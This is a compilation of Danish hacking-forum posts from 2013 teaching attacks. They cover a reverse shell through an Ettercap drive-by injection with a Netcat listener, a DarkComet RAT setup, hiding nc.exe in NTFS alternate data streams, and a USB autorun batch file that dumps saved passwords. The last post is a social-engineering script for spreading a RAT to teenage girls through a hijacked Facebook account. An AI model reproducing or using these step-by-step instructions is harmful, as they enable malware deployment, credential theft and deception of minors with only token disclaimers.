-P - Her kan vi vælge hvilke plugins ettercap skal loade og køre under vores angreb. Der er mange spændende muligheder, men har kun valg at bruge ’autoadd’, der automatisk tilføjer nye Targets efterhånden som ettercap opdager dem.

Trin 7
Da vi har valgt at bruge vores reverse_tcp payload skal vi også have en listnener af en slags kørende klar til at modtage indgående forbindelser. Det kan være alle slags listeners, såfrem de er kompatible med vores payload. Har valgt at bruge Netcat, men du kan også bruge en af Metasploit’s handlers.
-l - Fortæller Netcat at vi vil ’lytte’ efter indgående forbindelser, i stedet for selv at udføre en udgående forbindelse
-v – Giver os simple beskeder om Netcats aktivitet
-p – Porten Netcat skal ’lytte efter’

Citer:Nc –lvp 9191

Done!
Hvis vi besøger en tilfældig HTTP side nu, kan vi se i vores Ettercap terminal, at vores filter virker lige som det skal. Hvis du ikke har ændret i filteret før du kompilerede det, vil dit output se nogenlunde således ud:

(Kan se der står taipans - hvis jeg husker rigtigt er det Java Drive-by Applet' fra FinFisher Web. Testede deres applet da jeg skrev denne tutorial, så det skulle være den eneste grund til at der ikke står _JAVA_, hvilket der gør i det Drive-By jeg linkede til)
Desuden bruger jeg Internet Explorer for at undgå de sikkerhedsforanstaltninger Firefox og Chrome bruger! - Nemlig Click-2-Play

Hvis vi vælger at køre dette applet, kan vi se at vores payload bliver kørt, og vi får med det samme en reverse_tcp shell ved hjælp af Netcat.

Og lige for en god ordens skyld tjekker vi lige om det nu også er vores testmaskine vi har inficeret, og ikke en tilfældig forbipasserende på netværket:

DarkComet

Tue, 03 Dec 2013 14:45:49 +0100

Tænkte jeg lige ville lave en lille guide med DarkComet, da flere folk gerne vil have det til at virker, og der har været nogle stks der spøgerpå ss hvordan man sætter det op :D Jeg vil derfor ikke gå i dybden med teori, da stortset alle kender til det.

Jeg er ikke ansvarlig for hvordan i bruger det her program!

Download link: http://adf.ly/RUmJ9
(fandt lige linket på HF.... Find et selv ellers..)

OKay...
Det første vi skal er at lave en account på "no-ip"

Kode:
http://www.no-ip.com

Her trykker i så på "sing-up" og på free dns, derefter udfylder jeres fake informationer.
brug evt. info her fra:

Kode:
http://da.fakenamegenerator.com/

Så skal i vælge jeres OS, og derefter downloade det.

Nu logger i så ind på jeres account og trykker "add host"

Nu vælger i så at lave en host med "NO-IP.BIZ" Og giver hosten et eller andet navn.
Nu åbner i så no-ip som i har downloadet og logger ind.

Nu trykker i så på "Select Host"
Der skulle gerne stæ jeres host navn:

Sådan! Nu har du sat "no-ip" op :D

Nu til DarkComet:
1: i skal portforword, jeg regner med at lave en guide på et tidspunkt, men ellers er det altså også nemt! DEt kan gøres via "utorrent" eller din router.

2:
Åben dit DarkComet det her er v5.3:

3:
Klik på DarkComeet-Rat i venstre hjørne, og tryk "listen" Der indsætter du så den port som, du portforworded før.

4:
Nu klik på "server moodul"

5:
Ret så det ser sådan her ud: (crypter du så ikke tryk firewall)

6:
Ændre domain og ip, til det du har lavet med "No-ip"

7:
Ikke klik på "Module startup" hvis din crypter har en startup som en mulighed. Skip altinger undtangen det du behøver. Klik på "Build Module" og lad det stå som det er.

Lycia OUT.

Windows XP ADS i NTFS

Sun, 03 Nov 2013 04:15:58 +0100

Intro:
ADS står for Alternate Data Stream, og er en funktion der eksisterer i Microsofts NTFS filsystem.
Oprindeligt er det vist for at have noget kompabilitet med nogle ældre Machintosh filsystemer.
Dette virker, så vidt jeg ved, i Windows XP og ældre Microsoft operativ systemer.
Nyere operativ systemer benytter OLE 2.0 structured storage (IStream and IStorage), som jeg desværre ikke har erfaring med.

Lidt om ADS:
ADS tillader at gemme filer i andre filer uden at påvirke de eksisterende filer.
Dvs. den originale fil, skifter ikke filstørrelse eller lign., når en anden fil gemmes oven i den.
Man vil heller ikke kunne se den nye fil, når man lister et directory med "dir" kommandoen. Derfor er det også vigtigt, man husker på, hvor man har gemt sin fil. Evt. brug den samme fil alle steder, man ønsker at bruge ADS.
For at se disse filer, som er gemt med ADS, skal man bruge nogle specielle værktøjer.
Umiddelbart lyder det lidt underligt at gemme en fil, oven i en anden fil, men det bliver forhåbentligt klart, med et eksempel.

Gem NetCat med ADS:
Lad os antage, vil gerne vil gemme NetCat på en windows computer,
men gerne vil skjule den fra brugeren, så kan vi gemme nc.exe oven i f.eks. notepad.exe.
Det er ikke et krav, at den fil, vi bruger til at skjule nc.exe i, er en eksekverbar fil.
Det kan lige så vel være en tekst fil. Det er selvfølgelig smart at vælge en fil, vi er sikker på, ikke bliver slettet.
F.eks. en fil, som følger med windows. Man skal bare overveje, om det er en som biver overskrevet af patches.

Kode:
c:\Windows\System32>type nc.exe > notepad.exe:nc.exe

Windows kommandoen type, skriver bare indholdet af nc.exe ud på skærmen. Dette er tilsvarende cat, more osv, på linux.
Vi tager så outputtet fra type, altså indholdet af nc.exe og piper det med ">" over i notepad.exe.
Vi vil så frem over referere til nc.exe under navnet "notepad.exe:nc.exe".

Eksekvering af NetCat:
Når vi skal starte nc.exe, som er gemt i notepad.exe, bruger vi windows kommandoen "start".

Kode:
c:\Windows\System32>start notepad.exe:nc.exe

Så simpelt er det! Man skal selvfølgelig slette den originale nc.exe, den som ikke er gemt via ADS. Dette påvirker ikke notepad.exe:nc.exe filen.
Det kan selvfølgelig gøres med "del" kommandoen. Hvis det gøres over Metasploit Meterpreter, er det en god idé at bruge "/Q" parametren, da man ellers kan miste sin session.
Den fortæller "del" kommandoen, man ønsker at bruge Quiet mode, hvilket betyder man ikke ønsker at blive prompted for noget.

Browsing ADS filer:
For at se, hvad der gemmer sig i ADS på notepad.exe, kan man bruge windows kommandoen "more" hvor vi piper indholder af notepad.exe:nc.exe ud i more kommandoen med "<".

Kode:
c:\Windows\System32>more < notepad.exe:nc.exe

Dette er dog ikke så brugbart, hvis det er en eksekverbar fil, man har gemt i notepad.exe.
Det kan selvfølgelig lige så godt være en tekstfil med dumps af NTML hashes, eller hvad man nu har fået fingre i.

Links:
http://support.microsoft.com/kb/105763
http://en.wikipedia.org/wiki/COM_Structured_Storage

EDIT:
I nyere windows, kan man se filer med ADS indhold, ved at bruge kommandoen "dir /R".

USB Stealer

Thu, 03 Oct 2013 11:16:09 +0200

Det her er en guide til at lave en Usb Stealer. (Fandt lige det på et gammel usb stik, og tænkte det vil jeg dele med jer (Y))
Målet er at få et Usb stik man bare stikker ind, også åbner du et batch fil, også har man alle Passwords og de informationer man vælger.
Det man henter er ikke FUD (Fully undetectable) Så det vil sige smider du dit usb stik i, så siger alle med et virus program at der er noget virus, også bliver de slettet
Så man skal enten Selv lave den FUD, ellers så skal man slå virus programet fra på den pågældende computer.
Jeg giver jer en "smagsprøve" på hvad man kan vælge for at få nogle stks. passwords, man kan vælge mellem en masse forskellige ting her: http://www.nirsoft.net/utils/
Efter man har hente følgende ting:
http://www.nirsoft.net/utils/mspass.html - Det er stealern til alle mail programmer.
http://www.nirsoft.net/utils/mailpv.html - OGså til mails
http://www.nirsoft.net/utils/internet_ex...sword.html internet explorer Pass stealer
http://www.nirsoft.net/utils/pspv.html - Alt microsoft pass stealer
http://www.nirsoft.net/utils/router_pass...overy.html - Gemte Password på routern
http://www.nirsoft.net/utils/network_pas...overy.html Passwords og usernames på netværket
http://www.nirsoft.net/utils/dialupass.html - Gemte netværks på Computern samt koder til netværket
http://www.nirsoft.net/utils/passwordfox.html - Firefox pass stealer
http://www.nirsoft.net/utils/chromepass.html - crome
Her er der lidt andre ting i også kan finde: http://www.nirsoft.net/password_recovery_tools.html

Du henter filerne og unpacker dem (husk at slå antivirus programmet på din computer fra) og så lig dem over på dit Usb stik, i en mappe (vi kalder mappen usb drivers)
Nu skal vi så igang med det sjove.
Åbne dit notepad
skriv følgende:

Kode:
[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

Nu gemmer du så din notepad fil, som autorun.inf (husk at det altså ikke skal være.txt men .inf)
Gem din fil i mappen "usb drivers" Altså den vi lagde de andre filer ind i på usb stikket.

Når du har gjort det åbner du et nyt notepad dokoment.
skriv følgende:

Kode:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start routerpassview.exe /stext routerpassview.txt

start netpass.exe /stext netpass.txt

start chromepass.exe /stext chromepass.exe

Så gemmer du den notepad fil som launch.bat igen husk det skal være .bat og ikke .txt
nu ligger du også launch.bat ind i mappen usb drivers, også trykker du på den der hedder lunch.bat.. så kommer der nogle .txt dokomenter hvor det hele står i.
Spørgsmål i tråden tak!
Lycia out.
Ps. Håber det går det er uden billeder da det er så nemt...

Spredning af RAT via SE

Sun, 11 Aug 2013 02:55:09 +0200

Ved ikke om den hører til her, eller under SE?

Først skal det siges, at denne metode ikke er afprøvet, det er blot en tanke jeg har fået.

Ved også godt, det ikke er den mest effektive (nok ikke så stor spredning pr time) -
men ikke desto mindre en anden tilgang end mange af de "klassiske" (youtube film etc.)

Endvidere er målgruppen unge piger (16-17-år) - min erfaring er, at de ikke er heltså IT-kyndige som drenge (generelt) -
men derfra har man jo adgang til hele netværket.

Standard discalimer om, at jeg ikke kan stilles til ansvar hvis nogen prøver at bruge den.

humle Skrev:Husk det er ulovligt at hacke andre
og svare til at sparke døren ind i en anden vedkommens lejlighed.

Alt setuppet gider jeg ikke gå i detaljer med, men:

det kræves du har en RAT der er FUD (ellers skal du i hverfalt bruge noget vild SE)
det kræves at du har login til en facebook konto (du kan bruge til at sprede fra)

--- Så går vi i gang ---

Først logger man ind på den facebook profil man har adgang til.

Så skal der findes et "target" - dette findes på vennelisten.
Det er en god ide, lige at lure på hvornår den sidste besked er blevet sendt -
de skal jo helst ikke sidde ved computeren når deres conmputer "pludseligt begynder at skrive ting på facebook"

Endvidere kan det anbefales, ikke at vælge blandt "farvoritter" (de øverste) -
da der er stor sansynlighed for at de vil snakke om den fil der blev sendt den anden dag.

Så ned blandt dem, der ikke er så meget kontakt med.

Så skal der læses lidt:
Det er vigtigt du finder ud af facebook-konto-ejerens skrive stil, med "target".
Dette indebærer:
- Starthilsen (Hey, Hej, Yo, Wazzap, etc.)
- brug af stort startbogstav
- Brug af smileyer, hjerter osv.
Dette er vigtigt for at "target" ikke får mistanke.

------------------------------------------------------------------------------
- Eksempel på mulig mistanke:
------------------------------------------------------------------------------
- Konto-ejer stil: Hej Søde
- Mistanke fejl: Heeey!
-
- Konto-ejer stil: Det er bare knæhøj karse
- Mistanke stil: d r bar cool
-
- Konto-Ejer: Det syns jeg vi skal gøre
- Mistanke stil: Letz do it niggah bro, su'?!
------------------------------------------------------------------------------

Tabellen kan OGSÅ læses, hvis man bytter fundt på Konto-ejer og Mistanke fejl.

For at skabe mere credit til kontoen hos "target" er det nødvendigt at snage lidt
mere, før du får i gang:

Det er en god ting at vide

Familie navne (bror/søster/far/etc)
Evt. kæreste (MÅ IKKE BRUGES SOM REFERENCE!)
Evt. andre venner, man ikke har i samme netværk*

Så er vi ved at være klar. Find target og begynd i den rigtige stil!

En starthilsen kunne være:
------------------------------------------------------------------------------------
- Eksempel på starthilsen
------------------------------------------------------------------------------------
- Konto (1): Pige, 16 år, stx, sønderjylland, bror "Anders", ikke-fælles-ven Anders
- Target(2): Pige 17 år, ikke en der er blevet skrevet til i laang tid
------------------------------------------------------------------------------------
- (1): Hey! Har du tid at hjælpe?
- (2): Ja, hva så?
- (1): Har fået det her spil, af Anders //NOTE: Bror
- (1): Men det vil ikk køre på min computer
- (1): Kan jeg få dig til at se, om det kan køre på din?
- (2): Hvilket spil?
- (1): Det er noget han selv har lavet, skal lige se det //NOTE: God at få med!!!
- (2): Ok. Hvad hedder det?
- (1): Final5 //NOTE: RAT-navn, skal gerne være legit spilnavn
- (1): Det kan hentes her [link til fil]
- ---
- ---
- (2): Den siger bare fejl her
- (1): Det gør den også ved mig
- (1): Men mange tak for hjælpen
- (2): Så lidt
------------------------------------------------------------------------------------
Derefter skal beskeden slettes. Dette foregår under
"Beskeder" (Duh!). Her markeres tråden man ønsker slette, og under "Actions" vælges "Delete conversation" (tak til DoctorBue). Dette gøres så kontoejer ikke får mistanke.

Har du gjort dit arbejde godt nok, har du nu en ny konto du kan suge facebook login -
rince and repear.

-------------------------------------------------------------------------------------

... Senere: Flere eksmepler + stavekontrol!

*) Bonus: Sjovt tool til at se dit netværk http://wolframalpha.com/facebook